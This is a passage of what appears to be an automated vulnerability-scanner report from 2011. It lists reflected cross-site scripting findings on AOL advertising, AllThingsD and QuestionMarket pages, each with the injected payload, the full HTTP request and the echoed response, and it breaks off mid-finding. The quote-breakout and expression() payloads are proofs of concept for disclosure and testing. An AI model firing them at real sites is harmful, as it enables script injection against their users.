Date: Wed, 07 Sep 2011 12:52:03 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/fac16"-alert(1)-"9688e994782/8/3/1715267017/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascrip
...[SNIP]...

1.33. http://advertising.aol.com/token/8/3/547826303/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/3/547826303/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 99357"-alert(1)-"4ee7bb08df1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /99357"-alert(1)-"4ee7bb08df1/8/3/547826303/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:52:47 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:52:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/99357"-alert(1)-"4ee7bb08df1/8/3/547826303/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.34. http://advertising.aol.com/token/8/3/609451831/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/3/609451831/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5176c"-alert(1)-"bf7c2c63e04 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /5176c"-alert(1)-"bf7c2c63e04/8/3/609451831/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|27329332051D1158-60000108802F7C0B[CE]; s_pers=%20s_getnr%3D1315270057850-New%7C1378342057850%3B%20s_nrgvo%3DNew%7C1378342057854%3B; UNAUTHID=1.56118f34d7f711e0bb11edb33f645290.f2d4

Response

HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 12:27:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 07 Sep 2011 12:27:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/5176c"-alert(1)-"bf7c2c63e04/8/3/609451831/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript
...[SNIP]...

1.35. http://allthingsd.com/20110906/history-repeats-itself-at-hewlett-packard-webos-unit/ [refcat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://allthingsd.com
Path:   /20110906/history-repeats-itself-at-hewlett-packard-webos-unit/

Issue detail

The value of the refcat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43cc3"style%3d"x%3aexpression(alert(1))"00b4de691d2 was submitted in the refcat parameter. This input was echoed as 43cc3"style="x:expression(alert(1))"00b4de691d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /20110906/history-repeats-itself-at-hewlett-packard-webos-unit/?refcat=enterprise43cc3"style%3d"x%3aexpression(alert(1))"00b4de691d2 HTTP/1.1
Host: allthingsd.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=40; atd_cookie_notice=2; atd_social_notice=3; __unam=c2a74e1-13244e87052-2593e6fc-6; __utma=1.293351741.1315416510.1315416510.1315416510.1; __utmb=1.1.10.1315416510; __utmc=1; __utmz=1.1315416510.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; _chartbeat2=zh35qdggj5pjfrad; s_sq=djglobal%2Cdjatd%3D%2526pid%253DATD_Kara%252520Swisher_CrunchFund%25253F%252520Unethical%252520Ventures%25253F%252520Pig%252520Pile%252520Partners%25253F%252520No%252520Matter%252520What%252520You%252520Call%252520It%25252C%252520It%252526%2525238217%25253Bs%252520Business%252520as%252520Usual%252520in%252520Silicon%252520Valley.%2526pidt%253D1%2526oid%253Dhttp%25253A//allthingsd.com/20110906/history-repeats-itself-at-hewlett-packard-webos-unit/%25253Frefcat%25253Denterpri%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 07 Sep 2011 12:33:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Vary: Cookie
X-Pingback: http://allthingsd.com/xmlrpc.php
Link: <http://allthingsd.com/?p=116953>; rel=shortlink
Content-Length: 85118

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns="http://www.w3.org/19
...[SNIP]...
<a href="http://ad.doubleclick.net/jump/allthingsd.com/enterprise43cc3"style="x:expression(alert(1))"00b4de691d2_singlepost;tile=1;sz=300x250;ord=123456789?" target="_blank">
...[SNIP]...

1.36. http://allthingsd.com/20110906/history-repeats-itself-at-hewlett-packard-webos-unit/ [refcat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://allthingsd.com
Path:   /20110906/history-repeats-itself-at-hewlett-packard-webos-unit/

Issue detail

The value of the refcat request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3fb07'%3balert(1)//4d2d623eb2a was submitted in the refcat parameter. This input was echoed as 3fb07';alert(1)//4d2d623eb2a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /20110906/history-repeats-itself-at-hewlett-packard-webos-unit/?refcat=enterprise3fb07'%3balert(1)//4d2d623eb2a HTTP/1.1
Host: allthingsd.com
Proxy-Connection: keep-alive
Referer: http://allthingsd.com/20110902/crunchfund-unethical-ventures-pigpile-partners-no-matter-what-you-call-it-its-business-as-usual-in-silicon-valley/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=40; atd_cookie_notice=2; atd_social_notice=3; __unam=c2a74e1-13244e87052-2593e6fc-6; __utma=1.293351741.1315416510.1315416510.1315416510.1; __utmb=1.1.10.1315416510; __utmc=1; __utmz=1.1315416510.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; _chartbeat2=zh35qdggj5pjfrad; s_sq=djglobal%2Cdjatd%3D%2526pid%253DATD_Kara%252520Swisher_CrunchFund%25253F%252520Unethical%252520Ventures%25253F%252520Pig%252520Pile%252520Partners%25253F%252520No%252520Matter%252520What%252520You%252520Call%252520It%25252C%252520It%252526%2525238217%25253Bs%252520Business%252520as%252520Usual%252520in%252520Silicon%252520Valley.%2526pidt%253D1%2526oid%253Dhttp%25253A//allthingsd.com/20110906/history-repeats-itself-at-hewlett-packard-webos-unit/%25253Frefcat%25253Denterpri%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 07 Sep 2011 12:33:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Vary: Cookie
X-Pingback: http://allthingsd.com/xmlrpc.php
Link: <http://allthingsd.com/?p=116953>; rel=shortlink
Content-Length: 84939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!--[if lt IE 7 ]> <html class="no-js ie6" xmlns="http://www.w3.org/19
...[SNIP]...
<script language="JavaScript" type="text/javascript">
           if("undefined"==typeof(ord)) ord=Math.random()*10000000000000000;
           if("undefined"==typeof(ad_zones)) ad_zones=[]; ad_zones.push('enterprise3fb07';alert(1)//4d2d623eb2a_singlepost');
           if("undefined"==typeof(ad_sections)) ad_sections=[]; ad_sections.push('allthingsd.com');
           document.write('<script language="JavaScript" type="text/javascript" src="http://ad.doublec
...[SNIP]...

1.37. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [auto_ctl_invite parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the auto_ctl_invite request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2a9f'-alert(1)-'f17657d39c9 was submitted in the auto_ctl_invite parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0f2a9f'-alert(1)-'f17657d39c9&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/GateFile.html?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435; linkjumptest=1; endsurvey=no

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:34:32 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: LP=1315398872; expires=Sun, 11 Sep 2011 16:34:32 GMT; path=/; domain=.questionmarket.com
Content-Length: 2702
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
ady_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0f2a9f'-alert(1)-'f17657d39c9&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7';
try {
   if (dle.sr
...[SNIP]...

1.38. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [lang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the lang request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16939'-alert(1)-'633f27d02c8 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=16939'-alert(1)-'633f27d02c8&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/GateFile.html?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435; linkjumptest=1; endsurvey=no

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:34:28 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b202.dl
Set-Cookie: LP=1315398868; expires=Sun, 11 Sep 2011 16:34:28 GMT; path=/; domain=.questionmarket.com
Content-Length: 2702
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
t;
if (!df.DL_already_ran){
dle=d.createElement('script');
dle.src='http://amch.questionmarket.com/adscgen/d_layer.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=16939'-alert(1)-'633f27d02c8&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7';
...[SNIP]...

1.39. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [loc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78a38'-alert(1)-'cf5908a5123 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM778a38'-alert(1)-'cf5908a5123 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/GateFile.html?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435; linkjumptest=1; endsurvey=no

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:34:37 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b102.dl
Set-Cookie: LP=1315398877; expires=Sun, 11 Sep 2011 16:34:37 GMT; path=/; domain=.questionmarket.com
Content-Length: 2702
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
g=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM778a38'-alert(1)-'cf5908a5123';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e) {}
dle.type="text/javas
...[SNIP]...

1.40. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5433'-alert(1)-'ded7162e703 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7&f5433'-alert(1)-'ded7162e703=1 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/GateFile.html?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435; linkjumptest=1; endsurvey=no

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:34:41 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
DL_S: b201.dl
Set-Cookie: LP=1315398881; expires=Sun, 11 Sep 2011 16:34:41 GMT; path=/; domain=.questionmarket.com
Content-Length: 2705
Content-Type: text/html

(function(){
var d=document,w=window,dle;

function ff(){
var p=w.parent,r;

while (p != top) {
try {
if (p.location.host == w.location.host)
   r = p.document.referrer;
} catch (e) { }

p = p.paren
...[SNIP]...
=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7&f5433'-alert(1)-'ded7162e703=1';
try {
   if (dle.src.search('d_layer') && (window['$WLXRmAd'] || (window.parent && window.parent['$WLXRmAd']))) {
       dle.src=dle.src.replace('d_layer','h_layer');
   }
} catch (e) {}
dle.type="text/jav
...[SNIP]...

1.41. http://amch.questionmarket.com/adscgen/dynamiclink.js.php [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/dynamiclink.js.php

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fee25'-alert(1)-'65069f0c0a8 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adscgen/dynamiclink.js.php?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1fee25'-alert(1)-'65069f0c0a8&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://online.barrons.com/static_html_files/GateFile.html?sub=amch&type=d_layer&survey_num=925807&site=9&code=927332&p=1&protocol=http&lang=&auto_ctl_invite=0&loc=aHR0cDovL2FkLmRvdWJsZWNsaWNrLm5ldC9hZGkvYmFycm9ucy5jb20vc2VhcmNoOyFjYXRlZ29yeT07bXNyYz1udWxsO251bGw7cHVibGljX290aGVyO3B0aWxlPTI7c3o9MzAweDI1MDtvcmQ9MTk1MDMxOTUwMzE5NTAzMTk1MDM7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1; ES=921286-wME{M-0; LP=1315138435; linkjumptest=1; endsurvey=no

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 12:34:21 GMT
